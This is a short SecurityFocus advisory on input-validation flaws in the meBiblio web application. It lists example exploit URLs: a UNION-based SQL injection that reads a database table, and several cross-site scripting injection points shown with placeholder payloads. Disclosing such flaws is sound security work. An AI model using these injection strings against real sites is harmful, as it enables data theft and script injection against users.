Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

meBiblio Multiple Input Validation Vulnerabilities

Attackers can exploit these issues via a browser.

The following example exploits are available:

http://www.example.com/[path]/admin/journal_change_mask.inc.php?JID=1%20union%20select%201,PACS_description,1,1%20FROM%20pacs%20where%20PACS_ID=2
http://www.example.com/[path]/dbadd.inc.php?sql=<XSS>
http://www.example.com]/[path]/add_journal_mask.inc.php?InsertJournal=<XSS>
http://www.example.com/[path]/insert_mask.inc.php?InsertBibliography=<XSS>
http://www.example.com/[path]/search_mask.inc.php?LabelYear=<XSS>







 

Privacy Statement
Copyright 2009, SecurityFocus